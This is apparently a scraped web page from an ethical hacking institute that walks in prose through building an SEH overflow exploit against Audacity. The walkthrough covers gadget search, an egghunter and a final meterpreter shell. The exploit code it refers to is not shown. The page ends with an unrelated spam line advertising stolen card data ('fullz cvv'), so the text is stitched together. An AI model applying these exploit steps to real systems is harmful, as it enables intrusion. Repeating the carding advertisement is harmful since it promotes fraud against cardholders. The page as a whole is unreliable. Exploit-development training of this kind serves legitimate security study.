Advanced Ethical Hacking Institute in Pune
This is a standard SEH overflow. We can notice some of our user input a “pop, pop, ret” away from us on the stack. An interesting thing to notice from the screen shot is the fact that we sent a 2000 byte payload – however it seems that when we return to our buffer, it gets truncated. We have around 80 bytes of space for our shellcode (marked in blue). We use the Immunity !safeseh function to locate unprotected dll’s from which a return address can be found.
We copy over the DLL and search for a POP POP RET instruction combination using msfpescan.
As we used the pattern_create function to create our initial buffer, we can now calculate the buffer length required to overwrite our exception handler.
We modify our exploit accordingly by introducing a valid return address.
We then adjust the buffer to redirect the execution flow at the time of the crash to our return address, jump over it (xEB is a “short jump”) and then land in the breakpoint buffer (xCC).
Once again, we generate our exploit file, attach Audacity to the debugger and import the malicious file. This time, the SEH should be overwritten with our address – the one that will lead us to a pop, pop, ret instruction set. We set a breakpoint there, and once again, take the exception with shift + F9 and walk through our pop pop ret with F8.
Implementing the MSF egghunter is relatively easy:
The final exploit looks like this:
We run the final exploit through a debugger to make sure everything is in order. We can see the egghunter was implemented correctly and is working perfectly.
We generate out final weaponised exploit:
And get a meterpreter shell!
site to buy fullz cvv fullz shop